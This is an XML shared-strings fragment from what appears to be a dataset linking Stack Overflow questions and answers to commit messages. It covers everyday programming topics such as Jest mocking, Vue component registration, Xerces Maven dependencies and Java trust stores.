    <t>There are 2.11.0 JARs (and source JARs!) of Xerces in Maven Central since 20th February 2013! See Xerces in Maven Central. I wonder why they haven't resolved https://issues.apache.org/jira/browse/XERCESJ-1454...
I've used:
&lt;dependency&gt;
	&lt;groupId&gt;xerces&lt;/groupId&gt;
	&lt;artifactId&gt;xercesImpl&lt;/artifactId&gt;
	&lt;version&gt;2.11.0&lt;/version&gt;
&lt;/dependency&gt;
and all dependencies have resolved fine - even proper xml-apis-1.4.01!
And what's most important (and what wasn't obvious in the past) - the JAR in Maven Central is the same JAR as in the official Xerces-J-bin.2.11.0.zip distribution.
I couldn't however find xml-schema-1.1-beta version - it can't be a Maven classifier-ed version because of additional dependencies.</t>
  </si>
  <si>
    <t xml:space="preserve">We are developing applications for use within AutoCAD.
Basically we create a Class Library Project, and load the .dll in AutoCAD with a command (NETLOAD).
As so, we can use commands, "palettes", user controls, forms etc...
AutoDesk provides an API through some dll's, running in their program directory.
When referencing these dll's you can only call the dll's at runtime while loading your app in AutoCAD (This is a licensing security from AutoDesk).
For us, while developing, this is not a problem, we need to visually test within the context of AutoCAD, so we just set the Debug Properties so that they start acad.exe and load our dll with a script in the acad.exe parameters.
The problem is, when trying to unit test our code, NUnit or mstest are not running from within the AutoCAD context and they also cannot start it.
There exist a tool called Gallio, which has provided an interface with AutoCAD, so that it can run Unit test through IPC with Named Pipes.
However, this solution is, for me, too much of a hassle. I want to be able to quickly write tests without having to leave my beloved IDE.
So, what, from a "good design view" would be a good approach to this problem? I'm thinking I would basically need a testable codebase which is not referencing the AutoCAD dll's and a non-testable that does references the untestable AutoCAD dll's.
I'm sure there are ways to get this to work: ( IOC, DI, Adapter Pattern,. .) I just don't these principles in depth and thus I don't know which route will best suit my purposes and goals.
</t>
  </si>
  <si>
    <t>C545</t>
  </si>
  <si>
    <t>feat: should fetch students and pass it to view component
There are multiple ways to accomplish what this commit is doing, fetch data and forward it to another component.
I've deiced that a service will fetch the data. But it gets complicated because it's remote data because it's an observable.
To avoid boilerplate with the subscription I used the async pipe. This will ensure the subscription is closed correctly.
Test:
```
  it('should fetch students and pass them to the child component', async () =&gt; {
    const students = fakeStudents();
    mockStudentService(of(students));
    fixture.detectChanges();
    await fixture.whenStable();
    const studentsOverviewUi: OverviewUiComponent = fixture.debugElement.query(
      By.directive(OverviewUiComponent)
    ).componentInstance;
    expect(studentsOverviewUi.props.students).toEqual(students);
  });
  const mockStudentService =
    (getStudentsMockResult: Observable&lt;Student[]&gt;) =&gt; {
      jest.spyOn(studentService
        , 'getStudents'
      ).mockReturnValue(getStudentsMockResult);
      fixture = TestBed.createComponent(OverviewComponent);
      component = fixture.componentInstance;
    }
```
This test maybe looks a bit weird. I'm using jest spyOn to mock the service responses. Also, I'd to use the whenStable method because I'm using an async pipe, so we makes sure that the DOM is correclty rendered.
Because jest has issues with JS when mocking [link](https://stackoverflow.com/questions/56594114/jest-angular-change-value-of-spyon-mockreturnvalue), I had to add this mockStudentService method so it's correcly mocked.
  - There may be other solutions, please contact me if you find anything better :)</t>
  </si>
  <si>
    <t>If you create your component in a separate function with an argument which will be used inside
mockReturnValue
, then the solution works. However I don't accept this answer because I still don't understand why
mockReturnValue
can't be overwritten as expected and I hope somebody can still clarify it.
Here the code that works:
describe('whatever', () =&gt; {
  let component: SomeComponent;
  let fixture: ComponentFixture&lt;SomeComponent&gt;;
  let someService: SomeService;
  let spyObj: jest.Mock&lt;Observable&lt;any&gt;, [string | string[], object?]&gt;;
  beforeEach(async(() =&gt; {
    TestBed.configureTestingModule({
      imports: [
        SomeModule.forRoot()
      ],
      declarations: [ SomeComponent ],
      providers: [ SomeService ]
    })
    .compileComponents();
  }));
  afterEach(() =&gt; {
    fixture.destroy();
  });
  it('should create', () =&gt; {
    customBeforeEach();
    expect(component).toBeTruthy();
  });
  it('should check someFunction when someService returns "foo"', () =&gt; {
    customBeforeEach();
    component.someFunction();
    expect(component.something).toEqual('foo');
  });
  it('should check someFunction when someService returns "second foo"', () =&gt; {
    customBeforeEach('second foo');
    component.someFunction(); 
    expect(component.something).toEqual('second foo');
  });
  function customBeforeEach(value = 'foo'): void {
    someService = TestBed.get(SomeService);
    spyObj = jest.spyOn(someService, 'someMethod').mockReturnValue(of(value));
    fixture = TestBed.createComponent(SomeComponent);
    component = fixture.componentInstance;
    fixture.detectChanges();
  }
});</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Some tangential questions have been asked already. but this seems different - I am asking for a way to nicely instrument Express 5.0, not &lt;em&gt;predict&lt;/em&gt; matched routes.&lt;/p&gt;
&lt;p&gt;Related: &lt;a href="https://stackoverflow.com/questions/21336292/how-can-i-find-the-originally-matched-route-at-the-time-of-a-request-in-express"&gt;How can I find the originally matched route at the time of a request in Express.Js&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;What I would like to do is instrument express in such a way that for every route handler that is matched, the matching string pattern is added to an array of handlers for the given request, so that a later handler can see the &amp;quot;path&amp;quot; a request took through the app. I &lt;em&gt;really&lt;/em&gt; don't want to have to go modify every route in my app to instrument itself with &lt;code&gt;req.route&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For example, what is an implementation of &lt;code&gt;onRouteCalled&lt;/code&gt; where, given this code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;onRouteCalled(app, (req, route) =&amp;gt; {
   req.myMatchedRoutes ??= [];
   req.myMatchedRoutes.push(route);
});
app.use(function logPath(req, res, next) {
    res.on('close', () =&amp;gt; {
        // In the close event, req.route is available for the last route, but doesn't seem to include the information that would give me a full path. E.g. it only patches up to the last Router().
        console.log(req.myMatchedRoutes);
    });
    next();
});
const router = Router();
router.use('/bacon/:tastiness', (req, res, next) =&amp;gt; next());
router.use('/:food/:tastiness', (req, res, next) =&amp;gt; {
   res.sendStatus(204);
});
app.use(router);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;A request like &lt;code&gt;GET /bacon/delicious&lt;/code&gt; would log &lt;code&gt;['/bacon/:tastiness', '/:food/:tastiness']&lt;/code&gt; to the console?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C546</t>
  </si>
  <si>
    <t>chore: Centralized component to handle codestring requiring (WIP) :
Webpack require and imports strictly use inline string literals for file acquisition instead of dynamic variables.
More investigation is needed to find dynamic solution. Refer bellow:
https://stackoverflow.com/questions/42908116/webpack-critical-dependency-the-request-of-a-dependency-is-an-expression</t>
  </si>
  <si>
    <t>Solved with npm install request@2.79.0 --save
According to the authors of ajv, the issue will likely be resolved in the latest version of request in a few weeks' time.</t>
  </si>
  <si>
    <t xml:space="preserve">Say I have the following 4 .net assemblies:
Winforms UI
Business Logic 
SQL Server Data Access (implementing an IRepository)
Common Interfaces  (definition of IRepository etc.)
My business logic (2) makes calls to the data access layer (3) through IRepository (defined in 4) using constructor dependency injection. However when I ceate a business object I need to pass in an actual repository. I do this by having a singleton class in my business logic layer return the currently in use concrete object implementing IRepository. I am coming to the conclusion that this is a bad thing, as my business logic layer now has to reference 3 as well as 4.
I think I need a IoC Container but the question is where I create/put it as it seems that wherever I create this (1 - UI)? will also need to hold a reference to 3 (SQL Server Data Access). Am I not just moving the problem rather than achieving actual decoupling?
Do I create the IoC Container in the UI. Or expose it through another new assembly.
(I'm using C#, .net 3.5 and AutoFac)
Thanks.
</t>
  </si>
  <si>
    <t>C547</t>
  </si>
  <si>
    <t>Android App starting a Service in another App / Explict Intent
http://stackoverflow.com/questions/38971274/retrieving-the-component-name-of-a-service-defined-in-another-xamarin-applicatio/38973871#38973871</t>
  </si>
  <si>
    <t>The Application with the Service:
Package Name =
com.sushihangover.androidservice
[Service(Name="com.sushihangover.androidservice.MyMostAmazingService", Exported = true)]
[IntentFilter(new String[] { "myservice" }, Categories = new[] { Intent.CategoryDefault })]
public class PsiServiceHost : Service
{
    public override IBinder OnBind(Intent intent)
    {
        return null;
    }
    public override StartCommandResult OnStartCommand(Intent intent, StartCommandFlags flags, int startId)
    {
        Log.Debug("SO", "MyMostAmazingService Has Been Started");
        return base.OnStartCommand(intent, flags, startId);
    }
}
The other application starting
MyMostAmazingService
:
var intent = new Intent();
// Package name first, Service Class Name Second
intent.SetClassName("com.sushihangover.androidservice", "com.sushihangover.androidservice.MyMostAmazingService");
StartService(intent);</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the below powershell to try and add some columns and populate an xlookup.&lt;/p&gt;
&lt;p&gt;The data returns fine in powershell, like if I run $Data afterwards, it shows the formula properly, however once the Export-Excel is finished, the formula fields all have =@XLOOKUP...&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$data = Import-Excel -path &amp;quot;C:\SomeWorkbook.xlsx&amp;quot;
$row = 2
$data | ForEach-Object { 
    $_ | Add-Member -MemberType NoteProperty -Name &amp;quot;Role&amp;quot; -Value &amp;quot;=XLOOKUP(E$Row,UserData!A:A,UserData!C:C)&amp;quot;
    $_ | Add-Member -MemberType NoteProperty -Name &amp;quot;Department&amp;quot; -Value &amp;quot;=XLOOKUP(E$Row,UserData!A:A,UserData!D:D)&amp;quot;
    $_ | Add-Member -MemberType NoteProperty -Name &amp;quot;Division&amp;quot; -Value &amp;quot;=XLOOKUP(E$Row,UserData!A:A,UserData!E:E)&amp;quot;
    $_ | Add-Member -MemberType NoteProperty -Name &amp;quot;Manager&amp;quot; -Value &amp;quot;=XLOOKUP(E$Row,UserData!A:A,UserData!F:F)&amp;quot;
    $row++
}
$data | Export-Excel -path &amp;quot;C:\SomeWorkbook.xlsx&amp;quot; -worksheetname &amp;quot;Appdata&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;code&gt;=@XLOOKUP(E2,UserData!A:A,UserData!C:C)&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;Trying to add the columns, and then populate an xlookup for each cell.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C548</t>
  </si>
  <si>
    <t>Globally register components example (#1959)
* Automatic Global Registration of Base Components example did not work if you wanted to include subfolders. This solution has been tested and confirmed. https://stackoverflow.com/questions/53676837/registering-components-globally-in-vuejs-in-subfolders/53678945#53678945</t>
  </si>
  <si>
    <t>Here is what I ended up writing to achieve this same outcome:
const requireComponent = require.context(
  // The relative path of the components folder
  './global',
  // Whether or not to look in subfolders
  true,
  // The regular expression used to match base component filenames
  /[A-Z]\w+\.(vue|js)$/
)
requireComponent.keys().forEach(fileName =&gt; {
  // Get component config
  const componentConfig = requireComponent(fileName)
  // Get PascalCase name of component
  const componentName = Vue._.upperFirst(
    Vue._.camelCase(
      fileName
        .split('/')
        .pop()
        .replace(/\.\w+$/, '')
    )
  )
  // Register component globally
  Vue.component(
    componentName,
    // Look for the component options on `.default`, which will
    // exist if the component was exported with `export default`,
    // otherwise fall back to module's root.
    componentConfig.default || componentConfig
  )
})
Make sure all of you files in global are capitalized and have a .vue or .js extention.
Also with the path you provided make sure that main.js (or whatever your bootstrap file is called) lives one directory up from globals. Example:
/src
  main.js
  /global
This will make the a file such as ProgressBar.vue globally available in all of your components as ProgressBar
&lt;ProgressBar&gt;&lt;/ProgressBar&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">My company is developing  an application that receives data from another company via TCP sockets and xml messages.  This is delivered to a single gateway application which then broadcasts it to multiple copies of the same internal application on various machines in our organisation.
WCF was chosen as the technology to handle the internal communications (internally bi-directional).  The developers considered two methods.
Individual methods exposed by the
WCF service for each different
message received by the gateway
application.  The gateway
application would parse the incoming
external message and call the
appropriate WCF service method.  The
incoming XML would be translated
into DataContract DTOâ€™s and supplied
as argument to the appropriate WCF
method.
The internal application
exposed  a WCF service with one
method â€œProcessMessageâ€ which
accepted an Xml string message as
argument.  The internal app would
parse then deserialize the received
xml and process it accordingly.
The lead developer thought option two was the better option as it was â€œeasierâ€ to serialized/deserialize the xml.  I thought the argument didnâ€™t make sense because DataContracts are serialized and deserialized by WCF and by using WCF we had better typing of our data.  In option 2 someone could call the WCF service and pass in any string.  I believe option 1 presents a neater interface and makes the application more maintainable and useable.
Both options would still require parsing  and validation of the original xml string at some point, so it may also be a question where is the recommended place to perform this validation.
I was wondering what the current thoughts are for passing this kind of information and what peopleâ€™s opinions on both alternatives are.  
</t>
  </si>
  <si>
    <t>C549</t>
  </si>
  <si>
    <t>Add React-Bootstrap
- Update components to use more presentable React-Bootstrap
components
- React-Bootstrap should be used instead of vanilla Bootstrap because
vanilla Bootstrap uses jQuery to manipulate the DOM, which interferes
with how React relies on the assumption that nothing else is
modifying it
- See: https://stackoverflow.com/questions/53941329/use-bootstrap-4-with-react</t>
  </si>
  <si>
    <t>Certain functionalities such as dropdown, modal requires JS to manipulate the DOM, and bootstrap uses jQuery to handle the DOM manipulations.
However, React uses
virtual DOM
, so manipulating the browser DOM outside your React app through jQuery means React is potentially no longer handling state, events and UI rendering. And React broadly expects/assumes that nothing else will be modifying the DOM.
This is why
react-bootstrap
or
reactstrap
are recommended. The CSS remains exactly the same, but the components that initially require jQuery are rewritten.
Take
this bootstrap 4 modal
as example, you need to define
modal
state which determines whether the modal is being shown or hidden.
So essentially these react bootstrap libraries rewrite each bootstrap component into a React component, CSS wise it's entirely the same.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having trouble getting &lt;strong&gt;autocomplete&lt;/strong&gt; working on a docker redis stack server on my mac.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;docker run --platform linux/amd64 --name redis_search -d -p 6002:6002 \
  -v &amp;quot;/my_path/data/redis_search:/data&amp;quot; \
  redis/redis-stack-server:7.4.0-v3-x86_64 \
  redis-server /data/redis.conf
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and upon inspection I see no modules, I was thinking I could get commands like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;FT.SUGADD autocomplete &amp;quot;apple&amp;quot; 1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I don't see the module loaded and I get errors&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;127.0.0.1:6002&amp;gt; FT.SUGADD autocomplete &amp;quot;apple&amp;quot; 1
(error) ERR unknown command 'FT.SUGADD', with args beginning with: 'autocomplete' 'apple' '1' 
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have a simple redis.config as follows (for my dev local env):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bind 0.0.0.0
port 6002
dir /data
dbfilename dump.rdb
appendonly no
protected-mode no
save 900 1
save 300 10
save 60 10000
&lt;/code&gt;&lt;/pre&gt;
&lt;pre&gt;&lt;code&gt;127.0.0.1:6002&amp;gt; INFO server
# Server
redis_version:7.4.2
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b648dcb34d0d916f
redis_mode:standalone
os:Linux 6.4.16-linuxkit x86_64
arch_bits:64
monotonic_clock:POSIX clock_gettime
multiplexing_api:epoll
atomicvar_api:c11-builtin
gcc_version:11.4.0
process_id:1
process_supervised:no
run_id:00f4640b3da8caafbeb95eec16adefe815fb19f2
tcp_port:6002
server_time_usec:1740011058008861
uptime_in_seconds:75
uptime_in_days:0
hz:10
configured_hz:10
lru_clock:11957809
executable:/redis-server
config_file:/data/redis.conf
io_threads_active:0
listener0:name=tcp,bind=0.0.0.0,port=6002
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;127.0.0.1:6002&amp;gt; MODULE LIST
(empty array)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C55</t>
  </si>
  <si>
    <t>Do the worst thing ever, so Google lets us sign in (#37)
This change overrides the user agent for Google logins 
41 on Windows 7.
This causes users to be notified of a login to their account from a
Windows device when they sign in using system-settings.
We don't know why this works. We got the idea from this StackOverflow
question:
https://stackoverflow.com/questions/40591090/403-error-thats-an-error-error-disallowed-useragent</t>
  </si>
  <si>
    <t>In my case I was using native web view to login with Google, I find out the way that you should provide user agent to webview it was worked for me. Try below code I am sure it will worked.
Add the code in
application didFinishLaunchingWithOptions
Objective C
NSDictionary *dictionary = [NSDictionary dictionaryWithObjectsAndKeys:@"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", @"UserAgent", nil];
 [[NSUserDefaults standardUserDefaults] registerDefaults:dictionary];
Swift
UserDefaults.standard.register(defaults: ["UserAgent": "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"])</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to write a GIMP script to take information from a csv, place it onto a template image, save the file, and do so for every row of the csv.&lt;/p&gt;
&lt;p&gt;The csv is:&lt;/p&gt;
&lt;pre class="lang-none prettyprint-override"&gt;&lt;code&gt;location,name,address1,address2,phone
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is the script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import csv
from gimpfu import *
def create_image_from_csv(csv_file, template_file):
    with open(csv_file, 'r') as f:
        reader = csv.DictReader(f)
        for row in reader:
            location = row['location']
            name = row['name']
            address1 = row['address1']
            address2 = row['address2']
            phone = row['phone']
            template = pdb.gimp_file_load(template_file, template_file)
            image_width = template.width
            image_height = template.height
            text_layer = pdb.gimp_text_fontname(template, None, 10, 10, name, -1, True, 20, PIXELS, &amp;quot;Sans&amp;quot;)
            pdb.gimp_item_set_name(text_layer, &amp;quot;Name Layer&amp;quot;)
            pdb.gimp_text_fontname(template, None, 10, 40, address1, -1, True, 20, PIXELS, &amp;quot;Sans&amp;quot;)
            pdb.gimp_text_fontname(template, None, 10, 70, address2, -1, True, 20, PIXELS, &amp;quot;Sans&amp;quot;)
            pdb.gimp_text_fontname(template, None, 10, 100, phone, -1, True, 20, PIXELS, &amp;quot;Sans&amp;quot;)
            output_file = location + '-header.png'
            pdb.gimp_file_save(template, template.active_layer, output_file, output_file)
            pdb.gimp_image_delete(template)
create_image_from_csv('C:\Users\env25\Downloads\Gimpautotest\store_list.csv', 'C:\Users\env25\Downloads\Gimpautotest\testtemp.png')
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've tried adding&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;#!/usr/bin/python
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;at the top but no luck.&lt;/p&gt;
&lt;p&gt;I did confirm scripts can be recognized by creating a super simple HelloWorld.py style script and GIMP did pick it up.&lt;/p&gt;
&lt;p&gt;I am on Windows 11, using GIMP 2.10.38 and Python 2.7.18.&lt;/p&gt;
&lt;p&gt;I have seen ImageMagick suggested, but I am in a sort of locked down space software-wise, so I'm hoping to make GIMP work.&lt;/p&gt;
&lt;p&gt;I expect that when I 'browse' for a script in the Python-fu section of gimp, mine is listed. Or when I attempt to call it by name in the console, it at least attemps to run.&lt;/p&gt;
&lt;p&gt;I tried to add the &lt;code&gt;register&lt;/code&gt; section for a while but I saw somewhere that isn't necessary anymore after a recent update.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C550</t>
  </si>
  <si>
    <t>Try to restore existing activity on launch
If launchMode is not set to singleTop each application launch
will create new activity and existing components and services
will not be destroyed.
NativeScript/NativeScript#4863
https://stackoverflow.com/a/21622266/1868395</t>
  </si>
  <si>
    <t>I had the same problem with an application and I resolved this behavior adding flag
"android:launchMode="singleTop""
instead of
"android:launchMode="singleTask""
in the
&lt;activity&gt;
declaration of your AndroidManifest.xml file. Hope this will help somebody.</t>
  </si>
  <si>
    <t xml:space="preserve">I am building a web based application written in ASP.NET and Flex.  One of my biggest challenges is implementing security for the application in a flexible and maintainable way. This challenge is compounded when different technologies are involved.  I'll try to describe what I have below.
The website is laid out as follows:
/mydomain.com/
Login.aspx
Default.aspx  (hosts flex [.swf] application)
/Administration/
AddUsers.aspx
AddRoles.aspx
AddPermissions.aspx
etc...
/Services/    
SecurityService.asmx
MapService.asmx
PhotoService.asmx
etc...
I am currently using forms authentication to secure the resources on the website. All pages/resources not in the /Services/ folder require an authenticated user and will be redirected to Login.aspx if they are not yet authenticated. The .asmx pages allow unauthenticated users. To secure these resources I throw an exception in the SOAP method. This avoids redirecting pages for SOAP web services which is not supported by any SOAP web service clients I am aware of.  Finally, SecurityService.asmx contains a Login method to allow the Flex application to Login without redirecting to the Login.aspx page should the cookie expire for any reason.  Because the cookie established is sent with any request to the server, including requests coming from the Flex application, this seems to work pretty well.  
However, this still feels like a bad approach securing web services. I feel like I am using Forms Authentication for something it was not intended for. Specifically, I am concerned about:
This model will not work when the services are separated from the core website. This is a newly discovered requirement and I believe that Forms Authentication is not going to work well (if at all) without a lot more modification and trickery.
Clients other the Flex may require access to the services. Some of these clients may not even be able use cookies.  If so, this model immediately falls apart.  This is not an immediate requirement but it is known that this is one of the long term goals. 
We will eventually (hopefully sooner rather than later) move to a REST based architecture (vs. SOAP) so any solution needs to work for SOAP and REST.
So, my question is. 
What are the best authentication and authorization mechanisms for securing an application built on ASP.NET, Flex, and SOAP or REST web services?
Note: I am actively looking into OAuth; however, I am having a difficult time finding complete examples from which to learn.  Additionally, I need to be able to filter the data returned for a given user based on the permissions that user has, OAuth seems to remove the identity of the user from the token.  As such, I am not sure how OAuth applies in a fine grained security model.
</t>
  </si>
  <si>
    <t>C551</t>
  </si>
  <si>
    <t>Fix model persistence problem
To avoid the import problem when calling `pickle.load`, I wrapped up
all components of pipeline into `ClassifierWrapper` and add separate
training scripts.
Reference:
https://stackoverflow.com/questions/40287657/load-pickled-object-in-different-file-attribute-error</t>
  </si>
  <si>
    <t>in your class_def.py file you have this code:
if __name__ == '__main__':
    doc = Document()
    utils.save_document(doc)
This means that doc will be a __main__.Document object, (print(type(doc))) so when it is pickled it is expecting to be able to get a Document class from the main module, to fix this you need to use the definition of Document from a module called class_def meaning you would add an import here:
(in general you can just do from &lt;own module name&gt; import * right inside the if __name__ == "__main__")
if __name__ == '__main__':
    from class_def import Document 
    # ^ so that it is using the Document class defined under the class_def module
    doc = Document()
    utils.save_document(doc)
that way it will need to run the class_def.py file twice, once as __main__ and once as class_def but it does mean that the data will be pickled as a class_def.Document object so loading it will retrieve the class from the correct place.  Otherwise if you have a way of constructing one document object from another you can do something like this in utils.py:
def save_document(doc):
    if doc.__class__.__module__ == "__main__":
        from class_def import Document #get the class from the reference-able module
        doc = Document(doc) #convert it to the class we are able to use
    write_file = open(file_path, 'wb')
    pickle.dump(doc, write_file)
Although usually I'd prefer the first way.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have images of graph lines with trends, and I want to cluster similar trends together. However, after trying several clustering algorithms, they are not working as well as I expected. I believe that effective feature extraction is crucial, but since the images have a black background with only the graph lines, it seems to be challenging. In clustering, I feel that while there are lines that trend upwards similarly, they do not cluster well together, and instead, almost identical graphs are clustered together.
I can provide an example of the images.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/z1sCHIW5.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/KTdOrrGy.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="https://i.sstatic.net/9nZSEHQK.png" rel="nofollow noreferrer"&gt;enter image description here&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;I would like to know techniques that can effectively cluster such images.&lt;/p&gt;
&lt;p&gt;This is the code I used for feature extraction and clustering.&lt;/p&gt;
&lt;p&gt;I extracted features from the above images using ResNet and clustered them using DBSCAN.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import os
import numpy as np
import torch
from torchvision import models, transforms
from sklearn.cluster import DBSCAN
from PIL import Image
def load_images_from_directory(directory):
    images = []
    for filename in os.listdir(directory):
        if filename.lower().endswith(('.png', '.jpg', '.jpeg')):
            img_path = os.path.join(directory, filename)
            img = Image.open(img_path).convert('RGB')
            images.append((img, filename))
    return images
def extract_features(images):
    device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
    model = models.resnet18(pretrained=True)
    model = torch.nn.Sequential(*(list(model.children())[:-1]))  
    model = model.to(device)
    model.eval()
    preprocess = transforms.Compose([
        transforms.Resize((224, 224)),
        transforms.ToTensor(),
        transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
    ])
    features = []
    with torch.no_grad():
        for img, filename in images:
            img_tensor = preprocess(img).unsqueeze(0).to(device)  
            feature = model(img_tensor).cpu().numpy()  
            features.append((feature.flatten(), filename)) ìž¥
    return features
def cluster_images(features, eps=0.8, min_samples=3):
    feature_vectors = np.array([f[0] for f in features])  
    dbscan = DBSCAN(eps=eps, min_samples=min_samples)
    labels = dbscan.fit_predict(feature_vectors)
    return labels
def save_clustered_images(images, labels, output_dir):
    os.makedirs(output_dir, exist_ok=True)
    noise_dir = os.path.join(output_dir, 'noise') 
    os.makedirs(noise_dir, exist_ok=True)
    unique_labels = set(labels)
    for label in unique_labels:
        if label == -1:  
            for i, (feature, filename) in enumerate(images):
                if labels[i] == -1:
                    img_path = os.path.join(noise_dir, filename)
                    images[i][0].save(img_path)  
            continue
        cluster_dir = os.path.join(output_dir, f'cluster_{label}')
        os.makedirs(cluster_dir, exist_ok=True)
        for i, (feature, filename) in enumerate(images):
            if labels[i] == label: 
                img_path = os.path.join(cluster_dir, filename)
                images[i][0].save(img_path) 
input_dir = 'images' 
output_dir = 'clusterd_images'  
images = load_images_from_directory(input_dir)
features = extract_features(images)
labels = cluster_images(features, eps=0.3, min_samples=3) 
save_clustered_images(images, labels, output_dir)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm new to image processing, so I would appreciate any advice from my seniors.&lt;/p&gt;
&lt;p&gt;Since all the images have a black background with only blue lines, it is essential to extract features effectively, and I hope to cluster similar trends together during the clustering process.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C552</t>
  </si>
  <si>
    <t>[withMobileDialog] Improve types (#15276)
Motivated by https://stackoverflow.com/q/55547408/3406963.
Brings `withMobileDialog` in line with the other higher-order components.
This PR also disables the `no-empty-interface` rule. The rationale for this rule is incorrect. `interface` is not  equivalent to `type`.</t>
  </si>
  <si>
    <t>This is an issue with the types of @material-ui/core. We also inject a width prop. The following code should pass:
import { WithWidth } from "@material-ui/core/withWidth";
import withMobileDialog, { InjectedProps } from "@material-ui/core/withMobileDialog";
class MyComponent extends React.Component&lt;
  MyComponentProps &amp; InjectedProps &amp; Partial&lt;WithWidth&gt;, MyComponentState&gt; { 
    ... 
}
export default withMobileDialog()(MyComponent);</t>
  </si>
  <si>
    <t xml:space="preserve">We have a relatively large application that is strongly tied into Firebird (stored procedures, views etc). We are now getting a lot of requests to support additional databases and we would also like to move a lot of the functionality from the client to the server.
Now seems like a good time to move to a 3(4) tier architecture. We have already looked at DataSnap 2009 and RemObjects SDK/DataAbstract. Both seem like they would do the job, but are there any advantages/disadvantages we should look out for? Are there any other frameworks that you could recommend?
Cheers,
Paul
</t>
  </si>
  <si>
    <t>C553</t>
  </si>
  <si>
    <t>JENKINS-49668 - Root CAs component is fixed.
Links below provide some explanation example as to how to get the actual
trust store for inspection. They were used to replace the current broken
code which simply tries to enumerate empty KeyStore.
https://github.com/jenkinsci/jenkins-scripts/pull/82/files
https://stackoverflow.com/questions/8884831/listing-certificates-in-jvm-trust-store</t>
  </si>
  <si>
    <t>When they're used, JSSE uses these settings to build its default
X509TrustManager
(overriding the JRE default). However, there's nothing in the JSSE API to gain access to the keystore with which the default trust manager was build since, in the JSSE architecture, the default trust manager needs not be built from a keystore in principle.
If you want to read the content of the trust store passed via the
javax.net.ssl.trustStore*
properties, you will have to open the file yourself.
The closest thing you can get hold of will be the default
X509TrustManager
using the default
TrustManagerFactory
.
EDIT:
For more details, you can look at the implementation in the OpenJDK.
The logic in
sun.security.ssl.DefaultSSLContextImpl
(not part of the public API) is to initialise the
TrustManagerFactory
with a
KeyStore
obtained from the
TrustManagerFactoryImpl
(which is not part for the public API either):
KeyStore ks = TrustManagerFactoryImpl.getCacertsKeyStore("defaultctx");
TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
tmf.init(ks);
This is consistent with the behaviour of
TrustManagerFactory
with
tmf.init(null)
. This would also have relied on the default keystore, but that's documented in the public API.
Indeed, the implementation (with
tmf.init(null)
) ends up doing the same, as shown in
TrustManagerFactoryImpl
(
engineInit
also calls
getCacertsKeyStore
when the keystore parameter is null).
In both cases, the
KeyStore
variable is not stored in a class member, it's just a local variable that is not accessible after using these initialisation methods.
The resulting
X509TrustManagerImpl
does indeed contain the list of trusted certificates, but (a)
trustedCerts
is a private member and (b) none of this is part of the public API of the JSSE.
EDIT 2:
If you want something that is likely work most of the time, but is not guaranteed to work,
this answer
should help. Be aware that
the default trust store isn't necessarily
cacerts
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could you explain what is the exact difference between &lt;code&gt;x:DataType=&amp;quot;{x:Type model:myclass}&amp;quot;&lt;/code&gt; and &lt;code&gt;x:DataType=&amp;quot;model:myclass&amp;quot;&lt;/code&gt;?&lt;/p&gt;
&lt;p&gt;I've examined documentation and sources looking for correct code but have found examples of both kinds.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C554</t>
  </si>
  <si>
    <t>Globally register components example (#1959)
* Automatic Global Registration of Base Components example did not work if you wanted to include subfolders. This solution has been tested and confirmed. https://stackoverflow.com/questions/53676837/registering-components-globally-in-vuejs-in-subfolders/53678945#53678945
* Updated regex in global compnent registration code example to allow setting subfolder to true</t>
  </si>
  <si>
